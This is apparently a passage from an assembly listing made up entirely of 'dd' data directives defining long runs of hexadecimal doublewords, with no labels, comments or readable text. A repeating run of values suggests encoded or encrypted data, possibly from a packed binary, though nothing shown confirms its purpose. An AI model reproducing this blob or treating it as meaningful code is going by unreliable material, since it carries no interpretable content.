6B22ED73h dd 0FF91280Ah, 3D4FA998h, 60429DE0h, 85A934AFh, 0C0E2F8FCh dd 23D349AFh, 0A5BF9AA3h, 0D0D2C3EEh, 0A76F2731h, 1BAC586Ch dd 6B0BF7E3h, 0A69F4249h, 8DBE57Ch, 18041804h, 5F4B37C6h dd 6B82FD07h, 8F99280Ah, 0B0C4F0A3h, 9F8B8174h, 0FAA1B3B3h dd 45D4DEC7h, 0FDA4EC6Ch, 201C14D3h, 2E10100Ch, 51F5743h dd 3072639Eh, 0EB80C899h, 0B8CD3741h, 9FBC687Ch, 7BFBE7D2h dd 0F577971Bh, 50647864h, 0ED95753Ch, 0B0F2C3FCh, 0E5F941AFh dd 101226D1h, 9185BCADh, 8FD5C9FCh, 160F3AC9h, 0F4E07F0Ch dd 0BBD23D43h, 0F219585Ah, 8A10818h, 90A4B8CCh, 7FB9E921h dd 9A042E37h, 0AA214523h, 644E97h, 2434E56Eh, 33C4F2ECh dd 0A7128458h, 263F68C9h, 7F425FCh, 469FCA29h, 0A346C5Ch dd 0BA27A50Ch, 897CF0A6h, 0BD44586Ch, 1E5E695Eh, 5354CD05h dd 7C34FD15h, 7401181Ah, 29F6C0D4h, 66581819h, 0C3F6DF3Ch dd 0B0C430B9h, 0E129889Ch, 263FA1A1h, 0A44963FCh, 0F384AE90h dd 203C6C20h, 0D05D7C03h, 6C15A8BCh, 30445A64h, 0E1F06048h dd 55BB8CCh, 406253E6h, 7489E4A7h, 0A0B5CCF8h, 500E288Ch dd 142CD4h, 0E2968EECh, 0F58BDF9Ch, 101203DAh, 575921CFh dd 708499A8h, 225E190Dh, 0B8E5925Dh, 0C094A8BCh, 52D1A73Eh dd 76F43E27h, 0CBD04E49h, 443C3C2Ch, 0A704182Dh, 80907C23h dd 0AF64788Eh, 36286AA9h, 704181ECh, 74979EE8h, 7AF0B31Ch dd 9785BAFCh, 0AA1167FAh, 79347E67h, 913889h, 0C60157EAh dd 0BD446E57h, 0B7A64C4Bh, 1DFCFCA6h, 40556CEBh, 3037B32Ch dd 53EDD8B6h, 342827h, 5044786Ch, 0DA5127BEh, 0E174BEA7h dd 10263088h, 0E4A017FCh, 421167A4h, 73347E60h, 0ECD66DF3h dd 42C9A88Ah, 0EC45868h, 0A6F57D16h, 85DC3547h, 59B7684Ah dd 0E0048DA1h, 71B7C8EAh, 0D4B687DAh, 1F9C27FCh, 0BFC4D8EDh dd 60759818h, 2A1AB84Ch, 4092F889h, 0F48B9892h, 2034495Dh dd 0A5C4C68Ch, 0BE15EE4Dh, 770A113Ch, 2F7F4A69h, 0DFA5FE0Ah dd 2A05A657h, 0A352492Ch, 9C9E5D23h, 6B3D78BAh, 0DF9127FDh dd 3DC4D8ECh, 566A1919h, 7824524Ch, 0C0D4E8F0h, 0E57BCBFCh dd 20027476h, 0D0E4F431h, 3F11A7BCh, 0D944586Ch, 0E0F408ADh dd 0C2F4864Dh, 0C55B3E35h, 0F0041889h, 0CBC0E5Fh, 0D46B75B0h dd 1428A5h, 43B1F8D0h, 6F4EB430h, 1024B4C9h, 0E0D945FCh dd 4DA4B88Ch, 54512F7Dh, 0EC488779h, 1E8DD9Ch, 5864A712h dd 91817C68h, 0E0A7C64Dh, 357B4746h, 0F43DE44h, 1A85C7DCh dd 50645F9Ch, 0FF46CACBh, 86FF1279h, 30B4BB9Ch, 0F874681Ch dd 0C0D4E8F5h, 1EF3F7E8h, 44552730h, 0EA71070Ch, 5949E80h dd 3722CACh, 847181D5h, 0C1A48EF0h, 40566814h, 0A65549ACh dd 9E21378Ch, 0DD644EB0h, 360FBBA9h, 79F788ECh, 3224D9C8h dd 85DB691Dh, 0C0E2D38Eh, 8FA09C2Bh, 160F0EC9h, 5027000Ch dd 0B681C331h, 0F3BD596Ch, 0E19E0976h, 0E35B8B33h, 0C0419778h dd 0C6441091h, 0FEC0C9DCh, 0A10B809h, 0D09FF30Fh, 0E0C7D35Fh dd 0D7C105A0h, 9B240E51h, 0C0D5E446h, 780E13ACh, 2334485Dh dd 0B02FD3F4h, 26676337h, 77412C0Dh, 0CE1FFDFEh, 0C3AB7F4Fh dd 0CB03A4F7h, 9A5048F8h, 0CAE6999Ch, 56F18773h, 8B141E00h dd 86FFA261h, 6CB00B9Ch, 0F9A7F767h, 0AAD32FFBh, 0F98470ACh dd 73F74B13h, 87B0BE43h, 0DCD1FAFDh, 42273121h, 869B7B73h dd 0F9F3E4B8h, 373B0C12h, 8547445Fh, 0CED1BAAEh, 22012EF8h dd 6E7B414Fh, 0C0BC9DB0h, 506E7F0h, 7170383Eh, 0B4B18F8Eh dd 4F7F7E4h, 20344A5Ch, 5F96AD5Ch, 0E3E6C16Ch, 593E7608h dd 90DA6E79h, 0D9EAB8A0h, 2374233Fh, 846B604Fh, 0AAD5ACAAh dd 2212BD9h, 4F5E5F1Ch, 96E496A5h, 1406E1EAh, 0F8713239h dd 0C0D4E8FCh, 0D36919F1h, 0E6347E42h, 0E6F19389h, 156BA8BCh dd 307263F2h, 94EBE0DDh, 1BBAD2F0h, 766F3EC9h, 0CCA8412Ch dd 0C69EBDF2h, 4D9B460Dh, 0BD990B49h, 0B0F2E4B6h, 3776FE17h dd 9D815EE9h, 0F6E33979h, 870117ACh, 0DA347E6Bh, 5C1EBE85h dd 316F56F2h, 0DB8BBA6Dh, 1BEBE07Dh, 0EC274733h, 35506058h dd 0F881DE79h, 0A0B4FE9Ch, 50647064h, 43527B3Ch, 0FC889CC2h dd 0CAE1779Ch, 1B240E77h, 53C39C3Ch, 8FD79AC6h, 160F1AC9h dd 0A4247D0Ch, 881156B4h, 0CF446E2Ch, 641C9BCCh, 785B4732h dd 40546877h, 0AF475E7Fh, 0E49A9B93h, 0AF6434C0h, 362F82A9h dd 4EAD30ECh, 8E9C7763h, 0EFDBC7B9h, 0F6C63971h, 0FD4DABACh dd 16744CD9h, 81B5A90Ch, 0D1C5F8EDh, 96D1A73Dh, 8F43E27h dd 90A4B8C7h, 12113B29h, 0B42A2A1Fh, 5FB48490h, 665FD219h dd 1EC03Ch, 0C3B3D8ECh, 0E1DFAECh, 10655E38h, 924117ACh dd 0F984AE97h, 160F12D9h, 5DD5F70Ch, 0B68DD931h, 50C1D16Ch dd 0B1F43E20h, 0AB0E2D33h, 28C7684Ah, 0F0041828h, 0B9CA7D51h dd 0DD3D78BAh, 36286E81h, 456B30ECh, 0A7127763h, 263A52C9h dd 4384E8FCh, 469AF409h, 0B5B9485Ch, 0D0D2E626h, 81FEFCECh dd 58165806h, 60F4081Eh, 0ACEE2D33h, 80D1684Ah, 7D266D76h dd 96AA9551h, 560E2A8Ch, 1E7E9DB1h, 0E690D8DAh, 3225D8CCh dd 2C6AADB3h, 3F8CE8CAh, 46B8DE39h, 47B18E5Ch, 0D0E4CE32h dd 8094A454h, 7F170F6Ch, 0D2C7435Fh, 0DCE8FCE2h, 0EAC1977Ch dd 63042E17h, 0A0B4CFB4h, 85D1F58Ch, 59141E24h, 8CD26561h dd 4A9C88AAh, 0F8DBC7B9h, 0C0D4E8F0h, 39CAD1FBh, 0E600D12h dd 0D0A8B448h, 0BB3E3D43h, 0F0C1585Ah, 0E2C18C13h, 0F837B8CCh dd 40546879h, 0E917ADA1h, 2DEDC8EAh, 66584A31h, 0F4E7C03Ch dd 0D472713h, 6042B4AAh, 0A0374Ch, 41D4E8FEh, 70850840h dd 215C1C5Ch, 2FE4F80Dh, 0B6A8BE29h, 0A080D96Ch, 0B0F4081Dh dd 90CE6C47h, 76C1972Eh, 75042E10h, 0ADC1911Ch, 5077F0E4h dd 0CA81D73Ch, 5BC4EED7h, 0CC90B7Eh, 10240E52h, 4559C189h dd 70B286DCh, 2A1B70Ch, 55E4CE30h, 910A77Ch, 0BB44586Dh dd 0E07F045Ch, 152B8833h dd 40627610h, 0CE639DEAh, 0CAB5C8EAh, 3A65128Ch, 2E81D73Eh dd 33C4EED0h, 0E47B7764h, 1024392Ch, 0A841656Fh, 1A84AEB2h dd 0DF671A4Ch, 0E6D8E699h, 8F542DBCh, 304518E9h, 6249851Ch dd 21A48ED2h, 0BA7D8074h, 646CE7D3h, 0FEB4C8DCh, 64ED9EA7h dd 95EB7C18h, 0B0F2E34Eh, 7EE43511h, 1195387Ah, 3F2EE214h dd 0D111553h, 4A347E42h, 0D0F0900Ch, 0D3C6A8BCh, 0C6ECD93h dd 0A479082Ah, 529ACE8h, 40622878h, 0FAB2177Ch, 0B4908C57h dd 526C984Dh, 4A062976h, 0B38ECAEEh, 6850CC97h, 0D12BD9CCh dd 0CB85E01Ch, 8F94BCE8h, 9DB9186Eh, 0D0D2C464h, 8094B454h dd 66A7D6Ch, 0C0DA2864h, 0B59E98E2h, 787A4D59h, 0D07C3D54h dd 0EABEBBF9h, 702A31C3h, 95EB7F3Ch, 0B0F2E3B6h, 60D84C1Dh dd 104E384Ch, 3F87BFACh, 46B8B239h, 0A4B9C35Ch, 0BAE4CE19h dd 0EB8F4BBCh, 0D81555A5h, 0E0F40819h, 9AC09DEAh, 0D5AB3F7Ch dd 0F0322376h, 0F0B80C5Fh, 570C7367h, 8D14283Ch, 86DA4E51h dd 9F27DF9Ch, 261812D9h, 0BE146DFCh, 183115F8h, 0A3347E60h dd 0E6F17CA9h, 0D19A8BCh, 3072660Bh, 0E09EC637h, 6FF7EE9Dh dd 76684EE9h, 0F0FC9B2Ch, 2B25E7A2h, 38D1F572h, 0B0141E00h dd 0C56A2AE1h, 779CE88Ch, 71DBC7B6h, 0C937FF8Eh, 9B85EF21h dd 0BFBC3B6h, 0B85975C2h, 73949E80h, 0DBB3DFC8h, 750B5BA5h dd 909284D6h, 553FD5FCh, 8405181Ah, 0D584A0F6h, 0C59B788Ch dd 2213F6h, 8EA3656Ch, 147488AAh, 7CA1FF5Dh, 0C0D4DEE2h dd 0B68498ACh, 160A2FD9h, 0D80DF80Ch, 476B5742h, 6512CE9h dd 0E0F4081Ch, 9466E54Ch, 0F5E657Ch, 9F6B760Ch, 0C6DBE8B2h dd 360D14ACh, 4F340959h, 0DDADACCCh, 0F00A8F9h, 7C415B6Ch dd 0A1A68A99h, 7DA5FDD8h, 146856h, 0F0ABD82Ch, 0EDF9DDCFh dd 57642A09h, 85907A7Dh, 9AA999A2h, 25380D2Eh, 95686C42h dd 0D9D8BBAFh, 200510ACh, 6134514Ch, 0D5E4BC82h, 311F8E4h dd 644A5938h, 0B4A7C8D0h, 19E0F6CDh, 0E2F32h, 87EEF521h dd 0E8F7DCDDh, 10233605h, 0C098647Dh, 0B0DDD9A8h, 6030061Dh dd 98637142h, 0C694E4A8h, 36440AE3h, 6E71414Eh, 0F9E4AB88h dd 915FFBCh, 1A290238h, 0B2B180ABh, 2E5B8C9h, 4F4D6839h dd 0B6C4D479h, 0EEF1C1CEh, 107B2B08h, 8599675Fh, 0E4ED98EDh dd 6027015Ch, 95697158h, 0D4FDE8FDh, 3C440BABh, 21715C5Dh dd 80035CE8h, 2FA0F29Fh, 822C65h, 80E3BAB4h, 3C263904h dd 405A37F3h, 187B340Ch, 42F864E0h, 89663CBCh, 0FE974B3Ch dd 90A4B8CCh, 4054687Ch, 0F004182Ch, 0A0B4C8DCh, 5064788Ch dd 14283Ch, 0B0C4D8ECh, 6074889Ch, 1024384Ch, 0C0D4E8FCh dd 708498ACh, 2034485Ch, 0D0E4F80Ch, 8094A8BCh, 3044586Ch dd 0E0F4081Ch, 90A4B8CCh, 4054687Ch, 0F004182Ch, 0A0B4C8DCh dd 5064788Ch, 14283Ch, 64615B8Ch, 6074BEA3h, 2FFC9DCFh dd 0CFD4E8CAh, 0FD90DB1Bh, 973B500Fh, 0E7FE47h, 0A4B0EC37h dd 42481A47h, 0E8B63305h, 0D22FACBFh, 4C164368h, 0CFD08DA5h dd 253DC8EAh, 50524754h, 0C2972DD7h, 0D11D3AC4h, 0E8748C5Eh dd 26005EC9h, 0C0B000FCh, 50EC98ACh, 0AD34485Ch, 0E6C76B89h dd 98ADF1BCh, 0F0C75418h, 1F03EA18h, 0A69B0C49h, 99A3AB7Ch dd 0D462952Fh, 0B057C8EAh, 0DF980873h, 4FCAB3Ch, 2D4D2E0Eh dd 6042AB0Fh, 642402CFh, 0C3E6C3F9h, 3E0988DEh, 7E6F10A0h dd 0A4E4C28Fh, 6BA657B8h, 2036A76Fh, 1F0B5FF4h, 0BB6A9333h dd 766BB0F1h, 0BB07402Ch, 253B0BE8h, 50524734h, 3FA0ADFBh dd 0B0C4D8DAh, 5C9C889Ch, 9B24384Ch, 0F6EB5C79h, 861270ACh dd 38DCB7A3h, 53E4F80Ch, 0B6AB1C01h, 3831586Ch, 0C4FB9595h dd 0C4FB8FAh, 7FE0E583h, 7FC7181Ah, 968B7059h, 0E4F1F18Ch dd 0E8141E03h, 0B0C4D8EFh, 0EBB741AFh, 1024B8DFh, 2D3CBAFCh dd 737B6752h, 160B90C9h, 5332FB0Ch, 8F94A4C6h, 30455FE8h dd 0F08E8B1Ch, 6D20B7CCh, 0CB54687Ch, 1854146Eh, 5F4B3614h dd 6FBCFD8Fh, 0C617280Ah, 30CC52BCh, 79008865h, 640AC1CCh dd 313FA8FFh, 0F185D027h, 0FFEB97BDh, 941D79D3h, 0F594E4F0h dd 0F86F0180h, 0EF0EF19Fh, 90A40F43h, 38D50E7Ch, 0FF362BD2h dd 0A0B46359h, 6AE72E8Ch, 8B115D3Ch, 0B22FC8A6h, 91778217h dd 0EE56D01Dh, 75D71703h, 70B2A774h, 58F4CDF1h, 5460F7F7h dd 7F94A8BCh, 67B80D9h, 0B51C581Ch, 935B4732h, 766BB0F9h dd 2881972Ch, 0A3B4FEE3h, 0D3375C88h, 0DB272AFCh, 53CC6EE3h dd 40BD088Eh, 3400F91Fh, 0E4C8C1F8h, 2BA09485h, 0A1DDA31Ch dd 6B33F7F7h, 1AADC61h, 5E01F097h, 61C27CC7h, 319FE137h dd 0C17A1C83h, 4526CED7h, 2192BC70h, 88DEB77h, 810A5CCFh dd 0E82DA517h, 0E162FC6Fh, 351B7EB7h, 41DA9C1Dh, 55BBA857h dd 0DF323CBDh, 0E6DB4099h, 0F17DF3BCh, 6EBBA793h, 9E0CA9Fh dd 6F5B4623h, 443E69BFh, 532F074h, 353C3723h, 50525ECCh dd 1825905Ah, 54043AEEh, 6968A9Fh, 482252E7h, 3F21F314h dd 78461B53h, 255E99DBh, 25EA1054h, 7A145743h, 804F2B6Fh dd 0A0710A4Ch, 3AA48EEAh, 283E4F97h, 0A84B274h, 10ACBDDFh dd 0A48A909Dh, 1ACD7C3h, 34C4D8ECh, 0B179FC4Eh, 0FBEEC6ACh dd 78D1030Ah, 0F08498ACh, 0E38BAAF7h, 0E8546D81h, 57BFA88Ah dd 0C787829Bh, 0D6CCAD99h, 90A4B8CCh, 80C16774h, 60FF8EDh dd 968C6B59h, 5611798Ch, 259D255Ah, 3532CB07h, 6042B03Fh dd 76224D4Eh, 2BF1D9F1h, 7189FEA8h, 0C89F2E79h, 2F1B07B0h dd 9A0EB37h, 67B94F9h, 1737A31Ch, 0A69C1D49h, 4054687Ch dd 30911724h, 481E74D8h, 0AF9B8710h, 3FC4BDB5h, 3532D8DAh dd 6042B03Fh, 1F204D4Dh, 0EBD603CDh, 8747336Ch, 160CEDD9h dd 0D0E4F80Ch, 0AB3DCB4h, 67CC7E9h, 0EB14C91Ch, 0D52FB5AAh dd 0B8E4C31Ah, 6F819286h, 61B4FEE4h, 3761636Ch, 0AB12A158h dd 1BA218DFh, 4CC9A77h, 0BB243DC3h, 0F84B6D76h, 2880989Ah dd 8B2CA89Dh, 3B1848CFh, 6B2CCE9Ch, 0DBEF3E6Ch, 0B8F06205h dd 6F574724h, 9250E583h, 960CF8EDh, 0C67441D9h, 0E0679327h dd 27E82ACh, 432230B4h, 0B2F07763h, 184E0A38h, 330E00A4h dd 0BA7A6753h, 0E5408B2Eh, 199032F2h, 5BE06242h, 3C309292h dd 0EC80C2E2h, 9CD07232h, 8DBF91CCh, 39EFE59Ch, 655F3D6Ch dd 918F803Ch, 0B0A9A5FFh, 47C4EED4h, 564C2D19h, 1024384Ch dd 70D79C7Ch, 0F57332CCh, 200270F9h, 0D8E4F80Ch, 0D52CAFC8h dd 9B44B4E7h, 4571FF53h, 93A48EF4h, 4F55687Ch, 0F004CFA8h dd 0A5C78DCh, 0ECD9F127h, 0B0141E03h, 396F7204h, 564B4821h dd 0B5A1CF4Ch, 0C3D4DEC4h, 48498ACh, 85B1BF49h, 0D0E4CE34h dd 0F495A8BCh, 0CE85B069h, 944F7E3h, 152F1366h, 406257C0h dd 382FD7A7h, 9F707555h, 18ED78BAh, 647390C0h, 836FEE13h dd 97DFEE5Ch, 261C9DC9h, 0C0D4EBFCh, 868AECACh, 160CEBD9h dd 0D590780Ch, 7F6AEA54h, 5423E093h, 0D35F2E95h, 670FDE0Ch dd 766CCDF9h, 0F0041B2Ch, 56E1BCDCh, 665CDB09h, 561A83Ch dd 4F3AC604h, 9DD06063h, 3094C7B3h, 3F2F5E14h, 16BD7B53h dd 4621B7E4h, 5B4F69A7h, 0B6AC0D29h, 0C796AF6Ch, 0E0F40BDEh dd 78B0CDCCh, 0BFAB9502h, 60EC079Ch, 0C64B3727h, 36718734h dd 8BBFB997h, 74415323h, 4B74BEA3h, 0EC6CB184h, 0F8716D0Bh dd 7087989Ah, 0E40485Ch, 0E8417DFBh, 8094A88Ah, 12305E6Ch dd 0D8518DEBh, 90A4B8FAh dd 4521697Ch, 0FF9EAC4h, 5313F23h, 50644EB4h, 7410283Ch dd 4EC930E9h, 0E5837763h, 101200E9h, 0C0D4E8F8h, 176C8FD8h dd 98CBB7A2h, 181A3825h, 409C1017h, 88EF5C18h, 871FF069h dd 35214F67h, 48545E44h, 8504182Ch, 3094893h, 50644EB4h dd 3BFC6E48h, 83B2712h, 0A95D90B5h, 28BB9D46h, 2414E8CAh dd 0EF2192AFh, 8B347E64h, 5A4E49BCh, 0B6AC0B39h, 70F4F26Ch dd 0D86B8D16h, 0F60EB8FAh, 0B7A98AC4h, 0C63CBDA9h, 0A0B4D8DCh dd 0E0630C8Ch, 0B8728275h, 1BA22499h, 53DE602Ch, 0ADAD938Ch dd 0C0E2D754h, 48211D5Bh, 2014486Ah, 0D991F80Ch, 59EF00Ch dd 307260F1h, 614C6EB6h, 35214F0Ch, 545E44h, 8404182Ch dd 887048DFh, 68F9DD86h, 0AB72280Ah, 8F686565h, 97DF88AAh dd 261C9DC9h, 0C0D4E8FCh, 0C08DEDECh, 0BDB14A0Ch, 7AE4CE34h dd 0B8312D4Bh, 30C4585Ah, 0EB81081Ch, 15AE007Ch, 406250E2h dd 9639F386h, 57ACF964h, 665CDD09h, 15283Ch, 0C6ACECh dd 0FED182B5h, 0D0240E74h, 65DEEB18h, 70B2A032h, 9852E33Ah dd 5513088Dh, 80A29019h, 30445A6Ch, 28400A69h, 0A83A1DC6h dd 0EB32684Ah, 0CFCCA5A5h, 100CC8EAh, 0FB6478A4h, 38B1ADCBh dd 0B0CCD8DAh, 1100889Ch, 0EFD909A4h, 65511F03h, 7084AE94h dd 55344858h, 0DA5C4807h, 0B6AC3739h, 7DAFF26Ch, 0D8518DEBh dd 98A4B8FAh, 5121687Ch, 1087A04Ah, 982B6DD6h, 0FB0278BAh dd 0EBBEE80Fh, 997CBEF9h, 0FFD18284h, 0D0240E74h, 65DEEB18h dd 70B2A033h, 0A5C3E33Ah, 0D0D2C0A9h, 8094B8BCh, 0F0C5E00Ah dd 24740B68h, 0F01B2C4h, 26545E44h, 75B21787h, 0A082F07Fh dd 0ACA49027h, 85E3D7C3h, 0B0F2E049h, 2074889Ch, 40943138h dd 0F8496DFEh, 872E989Ah, 160CEDD9h, 0D0C4F80Ch, 0F51218BCh dd 0BD405C6Eh, 457EF653h, 90928051h, 7FE4E5F5h, 5B62181Ah dd 0D5B1345Ch, 0D064C88Bh, 0AA54D773h, 4F38A104h, 0C5F17F63h dd 10240E74h, 0A6D4E8BCh, 5B5FE14h, 461DFC5Eh, 0DAFC48A7h dd 0B6AC3739h, 33A4986Ch, 1CA0E0B6h, 18144733h, 78F1ED8Bh dd 7004181Ah, 0A2C1C8DCh, 0F5EEFE3Ch, 2210A1h, 4C44738Ah dd 0D073FD99h, 0EF6BB84Ch, 0EB3C42BCh, 877B6750h, 160CEDD9h dd 0D1E4F80Ch, 309FDDBCh, 0ADC1522Ch, 4AF43E24h, 28C2B727h dd 0E55EA8FFh, 0F03220B1h, 0A10463BAh, 0F5E18F26h, 141E04h dd 0C5C4DAECh, 0C5F17FB3h, 10240E74h, 0B5D4ECFCh, 7A4428B6h dd 160CD7D9h, 7441720Ch, 41949E84h, 8822488Ch, 505F897Ah dd 20AC53CCh, 0DFD1623Ch, 5A042E14h, 98114D2Bh, 506478BAh dd 10612834h, 5847608Ah, 58EA2D96h, 0BB42387Ah, 0C83FE94Ch dd 0F58ED01Ch, 200270C2h, 75610FA6h, 80949E84h, 8144486Ch dd 86D17D69h, 9A5C3B74h, 766CF6D9h, 0C3AF7E2Ch, 1D9D621Ch dd 5052473Ch, 38B1ADCBh, 0B0C4D8DAh, 7F0188BCh, 0BCF4FFDh dd 0D8DD509Ah, 481A3DA6h, 0C4F4486Ah, 4E41F20Fh, 0E6949E84h dd 80F971C7h, 6AF43E23h, 2001320Dh, 26545E43h, 0F25CA887h dd 968C5559h, 0D593D28Ch, 221099h, 0B1C4D8EFh, 0E583AAE8h dd 101200E9h, 0C4D4E8FCh, 0F5738ED9h, 200270F9h, 0D3E4F80Ch dd 47CADC9h, 0D8BBA796h, 1F0BF2B7h, 0A8013D3Bh, 4054684Ah dd 0F370102Ch, 571E016Ch, 665CDD09h, 14283Ch, 0E4AC6Ch dd 0FDF1A29Bh, 0D1240E74h, 49D9F21Ch, 7284BCA4h, 160CD5F9h dd 0D300380Ch, 2B906C3Ch, 56EE39DCh, 0EA14F7A4h, 0A69C2569h dd 0B7FF0E7Ch, 0C63CBDA9h, 0A0B4E8DCh, 0A7370C8Ch, 362C8DB9h dd 0B0C4D8ECh, 9779FCBCh, 10243B8Bh, 70D19CFCh, 836F323Ch dd 0ADBF8FD7h, 0D0D2C7A4h, 0C11D6997h, 3A1CE890h, 0D6CC9599h dd 155312CCh, 406250D9h, 0F044182Ch, 18D2C4A8h, 0D56EBBDCh dd 2210A1h, 8A2D207h, 0C57E6863h, 101200D1h, 4523439Ah dd 70B2A009h, 2134485Fh, 55138B78h, 80A29019h, 1044586Ch dd 27030568h, 90A4B8CFh, 0D0E46D08h, 7BF7F386h, 60314313h dd 7B644EB3h, 0FC5CA1F4h, 353311DFh, 6042B039h, 10A4384Ch dd 4559E689h, 70B2A031h, 0A07440D6h, 2897FBF5h, 0C459AC31h dd 0F1444848h, 6B4400FCh, 0F6A25B67h, 269459C4h, 7FBC7E87h dd 0A00CA05Ch, 0B166788Ch, 0AB4C835Ah, 0B6B11169h, 0A04530FAh dd 0D394932Ah, 70516556h, 8784AE94h, 160CEDD9h, 0D0E4F80Ch dd 0D792DDACh, 0DB1CA047h, 0C8A78305h, 408F40E7h, 7F9CE5F7h dd 6505181Ah, 0A082F774h, 14EF418Dh, 0BD9D2C18h, 0B0F2C88Bh dd 5FD83517h, 950F387Ah, 0C0E2D754h, 48211D5Bh, 2074486Ah dd 0D290F80Ch, 423F704Bh, 67125868h, 0DF14B59Fh, 9FA4B8FAh dd 4055B1F8h, 0F009F02Ch, 0E5FFC8DCh, 1C2136DEh, 443A1A0Fh dd 4FC494A0h, 564F1A09h, 0E4A1B14Ch, 93D4DEC3h, 73B8C027h dd 847B784h, 38D0BB87h, 7F6B5D5Ch, 0F90CDE7h, 0E3AF082Ah dd 152DB48Eh, 40625784h, 790C5A2Fh, 968B3459h, 7817F38Ch dd 949BC3h, 92CD8ECh, 0EB8B7769h, 261BECF1h, 6D3CBEFCh dd 0FB7B6759h, 160B9CC9h, 0D8AE730Ch, 0AB98E2BFh, 35ADDBA2h dd 0E1948013h, 14ABB8CCh, 40546926h, 0CFDCAD2Fh, 15B7C8EAh dd 50524714h, 0FFC1490h, 0B0C47A69h, 6432059Ch, 2FBCBD67h dd 0C6D7E8CAh, 85EE70FCh, 9DB7B7A3h, 0D0D2C7D8h, 0BB9FDDBCh dd 0B34B542Bh, 0E0F40907h, 59DB427h, 406257A8h, 0F1099D23h dd 25B7C8DCh, 50524714h, 0FF2CA95Ah, 4C41D7C9h, 0EB74889Ch dd 530F3A0Ch, 0ED3CB8C8h, 497B6759h, 160B9CE1h, 3461F70Ch dd 8394A8BCh, 67B80E9h, 78710B1Ch, 1BA48EF3h, 4C13437Ch dd 0F0C99A23h, 0E78FC8DCh, 94E77784h, 8314283Ch, 0F7C7DA2Ch dd 0F8F18B88h, 42240E73h, 346117ACh, 8F84AE93h, 160F1AC9h dd 1061A20Ch, 80232DB3h, 0ACAD586Ch, 0DCF4081Ch, 421B733h dd 0C054687Ch, 750B0D12h, 0A0B4C857h, 7B653E07h, 0E8441C7Fh dd 4F3B2C50h, 5FA035A5h, 6751387Ah, 0FF0C6DFFh, 0F587989Ah dd 200277C4h, 90E47D85h, 801FA88Ah, 0FBCDD57h, 0E886082Ah dd 0AF583DF7h, 2926684Ah, 0F0041811h, 4883BAACh, 50647893h dd 8BE866B1h, 0B3C6F32Dh, 0E54F98DEh, 1012784Ch, 457E489h dd 0FFB567BCh, 41286C18h, 5F27E3E7h, 0B6AB1039h, 85CF386Ch dd 0E0C23784h, 6F51E224h, 40FD0983h, 8584182Ch, 0ACF3E3D2h dd 175F71FEh, 3C962734h, 0F93B2713h, 9EC60D93h, 2CAFC7B3h dd 657369D8h, 8F849884h, 0CB4BB7A3h, 0F4AE794Eh, 6094A8DCh dd 0BB846B22h, 65732C10h, 9092872Ch, 7F88EDF5h, 4989181Ah dd 0A0B4E075h, 6FFCFD8Fh, 0A572280Ah, 76EF9649h, 4B60CA9Fh dd 56E2340Eh, 41130007h, 708498FEh, 20344859h, 8F18BE85h dd 7FC36BE2h, 67FC6F9h, 0FF1CC91Ch, 91BE3DC3h, 1404687Ch dd 0F6E3046h, 9B4A5D23h, 90E178BAh, 59C2763h, 58C4D8EDh dd 9F8B6DDCh, 102429A4h, 0B4B1BBFCh, 15E8F1EAh, 55572D0Fh dd 0A990917Eh, 356BA8FDh, 30726700h, 0DBA69DE3h, 152DB8FAh dd 40625708h, 0F00401C4h, 0F4D19BDCh, 1F0113EDh, 7271464Bh dd 0C0ADB09Fh, 161DFACCh, 77415425h, 2883E899h, 8F7B71BDh dd 20345BB4h, 8281AB0Ch, 0EFE0DBD9h, 42143D1Eh, 8C9D7E75h dd 90C1DFA9h, 0A8A7802Bh, 0E2ECE7D3h, 0F3B4C8DCh, 33053AE9h dd 50645D57h, 0D9B2B19Eh, 513EDF0h, 0C6CC6F4Ch, 282B1714h dd 708498B4h, 48772D0Fh, 0B583966Dh, 0E9E0C7F2h, 4214210Ah dd 8C9D7E75h, 90C1DFA9h dd 0A8E7802Bh, 0A454E7D3h, 9A044D51h, 340E78BAh, 5715426Ch dd 8CCE4D13h, 5CFD88AAh, 56B1C768h, 0EAD4DEC7h, 1839156Ch dd 70347E62h, 651BA85Ch, 80A2920Ch, 34445904h, 0E19E5C1Ch dd 0E431479Bh, 14545E43h, 0F531C46h, 968BBC49h, 44A0FB8Ch dd 3F789DC3h, 253BD8DAh, 6042B31Eh, 0A5A9FB13h, 0C0E2D694h dd 0F61167FAh, 0A3347E67h, 54EB07F4h, 8094A807h, 0F3CDDE5h dd 0E09E082Ah, 5231479Ah, 0C5545E47h, 548017ECh, 8BB4C8DCh dd 3A34284Ch, 17E783Fh, 0B0C4D884h, 0F58BDE5Ch, 1012032Eh dd 0CF2B107Fh, 70817028h, 5CB1C15Ch, 5DE4CE33h, 0B6AB2831h dd 0B8D1D56Ch, 0B1F43E23h, 0C0A4D29Eh, 7BDAFD83h, 887181Ah dd 1630C723h, 3A647889h, 7CA1D73Ch, 4FC4EED3h, 564F0209h dd 0EFDCBB4Ch, 0C54B6CF3h, 0F50D98ACh, 200277CCh, 13E7313Fh dd 0EAC5F8EDh, 85BB0968h, 0E0C23760h, 0ABC22D33h, 80D1684Ah dd 0F57F9C23h, 6987C8DCh, 6FF0FD05h, 5145280Ah, 0B0DBB0BDh dd 9F248893h, 261F96D9h, 0CF146DFCh, 7081AC28h, 0B8B1C15Ch dd 13E4CE33h, 80E4A004h, 80FD36Ch, 0D8518DEBh, 90A4B8FAh dd 4621787Ch, 0E0639D2Fh, 7287C8EAh, 0A193B98Fh, 859DC9CBh dd 0B0F2E748h, 605C2724h, 2C6FB34Ch, 0D0B36DFFh, 0A2B7989Ah dd 0D1C3895Fh, 556D19FBh, 80A29720h, 7BF357AFh, 0D517F11Ah dd 9FBCEB41h, 43402BCBh, 316F51FCh, 2164CBF4h, 391327B6h dd 1D60D152h, 0B1C8A26Fh, 2BFF68EEh, 466B370h, 4DC4AAFFh dd 877BD0E8h, 1BF56B85h, 0E6DB6889h, 0D41F6BBCh, 0F0774848h dd 0E04C8A93h, 1B67B8CCh, 0CD5F83B3h, 0C63A7091h, 7F3F34DCh dd 6CC8B1BFh, 3C125A5Dh, 9CC6AF96h, 3C4822BCh, 3E18D438h dd 0C0E83588h, 0B96770D9h, 650949D7h, 0A4E4BD54h, 0C3C795B7h dd 0B54B583Eh, 1F0BF72Fh, 0C799BB47h, 4F172635h, 0FFB3EA8h dd 0E3E3F523h, 0D46B36D9h, 0FFEBD727h, 83878FD1h, 70F087AEh dd 2DDBC7B3h, 8F80BBACh, 8F811CA3h, 0FB07B7A3h, 2F1AD5E4h dd 6884DD43h, 0CFBBA496h, 1F0A29F4h, 7C20B733h, 73AB9782h dd 0F012F0FEh, 0C35CC8DCh, 0B89B8773h, 